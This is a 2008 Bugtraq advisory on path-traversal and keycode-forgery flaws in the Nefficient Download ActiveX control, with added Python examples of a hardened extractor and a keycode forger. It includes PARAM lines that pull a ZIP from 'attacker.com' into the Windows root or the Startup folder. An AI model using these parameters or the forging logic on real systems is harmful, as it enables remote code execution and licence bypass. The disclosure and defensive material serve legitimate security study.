CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
- To: BUGTRAQ@xxxxxxxxxxxxxxxxx
- Subject: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
- From: "Simon Ryeo" <bar4mi@xxxxxxxxx>
- Date: Mon, 7 Apr 2008 18:09:04 +0900
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: CDNetworks Nefficient Download (NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Apply the vendor's patch
Vendor's Homepage: http://www.cdnetworks.com
Reference: How to stop an ActiveX control from running in Internet Explorer
(setting the kill bit, i.e. Compatibility Flags = 0x400 under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>,
for the CLSID listed above until the patch is installed)
http://support.microsoft.com/kb/240797/ko
http://support.microsoft.com/kb/240797/en-us
History:
- 02.27.2008: Initial notification to the vendor
- 03.06.2008: The vendor released a patch
- After: The vendor is deploying the patch to its customers.
Description:
Nefficient Download is an ActiveX control used to download and update files
such as game installers over HTTP, FTP and other protocols. It has two
vulnerabilities.
1st, an attacker can copy a malicious file to an arbitrary path, such as the
All Users Startup folder
(C:\Documents and Settings\All Users\Start Menu\Programs\Startup), because the
destination path taken from the control's parameters is not confined to the
control's own directory.
2nd, an attacker can generate the keycodes that are meant to restrict the
control to authorized domains, because the whole check runs inside the control.
Object:
I am disclosing this vulnerability not to promote abuse but to make the
software more secure. This vulnerability was patched through the vendor's
proactive effort. I hope this information helps the many people who study
security and develop applications.
1. Remote Code Execution
First of all, the attacker must either have write permission on a bulletin
board of a web site that uses this ActiveX control (so that the control is
already licensed for that site's domain), or obtain a valid keycode for a site
of their own (see section 2).
An attacker who has a valid keycode can build an exploit by modifying the
HttpSkin and SkinPath parameter values. HttpSkin points at a ZIP archive on
the attacker's site; the control downloads it and extracts its contents into
SkinPath, which is interpreted relative to the control's directory and is not
checked for ".." components.
For instance, the following parameters copy the attacker's files into the
Windows root directory:
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
In the same way an attacker can point SkinPath at the All Users Startup
folder. The malicious program then runs when the user restarts the computer.
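The following is an added example, not code from the advisory or from the vendor: it reconstructs the path handling described above in Python (the control itself is a native DLL) and puts the hardened form beside it. Everything about the control's internals here is an assumption; the archive, the install directory and the entry names are constructed inline. naive_target() shows where plain concatenation of install directory, SkinPath and entry name lands; safe_extract() refuses any SkinPath or archive entry that resolves outside the directory it is supposed to stay in (the second check also covers traversal inside the ZIP's own entry names, which the advisory does not mention but the same fix must handle).

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path


def build_skin_zip(entry_name: str = "skin/logo.bmp", data: bytes = b"BM-sample") -> bytes:
    """Constructed stand-in for the archive the control fetches from HttpSkin."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, data)
    return buf.getvalue()


def naive_target(install_dir: str, skin_path: str, entry_name: str) -> Path:
    """Where a control that simply concatenates install dir + SkinPath + entry
    name ends up writing. Hypothetical reconstruction of the behaviour the
    advisory describes: '../../../../' walks out of the install directory."""
    return Path(os.path.normpath(os.path.join(install_dir, skin_path, entry_name)))


def is_within(base: Path, target: Path) -> bool:
    """True if target, after resolving '..' components and symlinks, stays under base."""
    try:
        target.resolve().relative_to(base.resolve())
        return True
    except ValueError:
        return False


def safe_extract(zip_bytes: bytes, install_dir: str, skin_path: str) -> list:
    """Hardened extraction: SkinPath must stay under the install directory, and
    every archive entry must stay under the skin directory (zip-slip check)."""
    base = Path(install_dir)
    dest_dir = base / skin_path
    if not is_within(base, dest_dir):
        raise ValueError(f"SkinPath escapes install directory: {skin_path!r}")
    dest_dir = dest_dir.resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")  # Windows separators count as separators
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                raise ValueError(f"absolute entry name rejected: {info.filename!r}")
            target = dest_dir / name
            if not is_within(dest_dir, target):
                raise ValueError(f"entry escapes skin directory: {info.filename!r}")
            if info.is_dir():
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def run_demo() -> dict:
    """Exercise both behaviours in a scratch directory and return the outcomes."""
    root = Path(tempfile.mkdtemp())
    install = root / "Program Files" / "Nefficient"  # constructed install location
    install.mkdir(parents=True)
    results = {}
    # 1. A benign archive into a SkinPath under the install directory works.
    out = safe_extract(build_skin_zip(), str(install), "skins")
    results["benign_ok"] = len(out) == 1 and out[0].read_bytes() == b"BM-sample"
    # 2. The advisory's SkinPath value: naive joining lands outside the install dir.
    escaped = naive_target(str(install), "../../../../", "skin/logo.bmp")
    results["naive_escapes"] = not is_within(install, escaped)
    # 3. The hardened extractor refuses the same SkinPath.
    try:
        safe_extract(build_skin_zip(), str(install), "../../../../")
        results["traversal_blocked"] = False
    except ValueError:
        results["traversal_blocked"] = True
    # 4. Traversal hidden in an archive entry name is refused as well.
    try:
        safe_extract(build_skin_zip("../../evil.exe"), str(install), "skins")
        results["zipslip_blocked"] = False
    except ValueError:
        results["zipslip_blocked"] = True
    return results


if __name__ == "__main__":
    print(run_demo())
```

The containment test resolves both sides before comparing, so a SkinPath that is syntactically "inside" but reaches outside through a symlink or junction is caught too; comparing raw strings with startswith() would not be enough.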
2. Generating a KeyCode Value
An attacker can build a keycode generator by debugging this ActiveX control.
A keycode's value has two parts. The first two digits are the domain's length
in hexadecimal. The next five (or more) digits are the numeric value from
which the control derives a check value for the domain.
The keycode check procedure of this ActiveX control works as follows.
It computes a value from the keycode digits and returns four bytes as the
result. Next it computes a value from the domain and returns four bytes.
Finally, it compares these two four-byte values to decide whether the site is
valid. Since every step runs inside the control on the client, the same
computation can be run forwards to produce a valid keycode for any domain.
I made a PoC using inline assembly and C, but it is not being released to
the public at the vendor's request. (Refer to the description above.)
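The following is an added example and is not the author's withheld PoC: it reconstructs only the structure of the check described in section 2 and shows why a generator follows directly from the verifier. The control's real derivation functions are not public, so CRC32 stands in for the "four bytes from the domain" step and the keycode digits are taken as the decimal form of the "four bytes from the keycode" step; both are assumptions, and the argument does not depend on which functions the real control uses.

```python
import hmac
import zlib


# Hypothetical stand-in for the control's undisclosed derivation: the advisory
# only says that four bytes are derived from the domain and compared with four
# bytes derived from the keycode digits.
def domain_digest(domain: str) -> bytes:
    return zlib.crc32(domain.lower().encode("ascii")).to_bytes(4, "big")


def parse_keycode(keycode: str) -> tuple:
    """Split a keycode into (claimed domain length, value digits).
    Layout from the advisory: two hex digits of length, then decimal digits."""
    if len(keycode) < 3 or not keycode[2:].isdigit():
        raise ValueError(f"malformed keycode: {keycode!r}")
    return int(keycode[:2], 16), keycode[2:]


def verify_keycode(domain: str, keycode: str) -> bool:
    """The client-side check: four bytes from the keycode vs four bytes from the domain."""
    try:
        length, digits = parse_keycode(keycode)
        from_keycode = int(digits).to_bytes(4, "big")
    except (ValueError, OverflowError):
        return False
    return length == len(domain) and hmac.compare_digest(from_keycode, domain_digest(domain))


def generate_keycode(domain: str) -> str:
    """The 'keycode generator' of section 2: verify_keycode() lives entirely
    inside the control, so anyone who can read or debug it can run the same
    arithmetic forwards for any domain. No secret is involved anywhere."""
    if not 1 <= len(domain) <= 0xFF:
        raise ValueError("domain length must fit in two hex digits")
    return f"{len(domain):02x}{int.from_bytes(domain_digest(domain), 'big')}"


def forge_for(domains: list) -> dict:
    """Forge a keycode for each domain and report whether the check accepts it."""
    return {d: verify_keycode(d, generate_keycode(d)) for d in domains}


if __name__ == "__main__":
    # Constructed sample domains; every forged keycode is accepted.
    print(forge_for(["www.attacker.com", "games.example.co.kr"]))
```

Any keycode scheme that the client can evaluate entirely by itself can be re-implemented as a generator in this way. Binding a control to a domain needs something the client can verify but not produce, for example a signature over the domain made with a private key the vendor keeps, checked against a public key embedded in the control. Even then, the SkinPath check from section 1 is still required, because a legitimately licensed site can be abused by anyone who can post HTML on it.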
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.7.1 (Build 1503)
Charset: utf-8
wj8DBQFH+eM+zuoR/xLtCioRAhKKAJ4nkA8EGap6fZ+xvRJSNpCDlcanwQCglsYb
p8LCGeXrEnMoshPDBVB4dOc=
=OZDe
-----END PGP SIGNATURE-----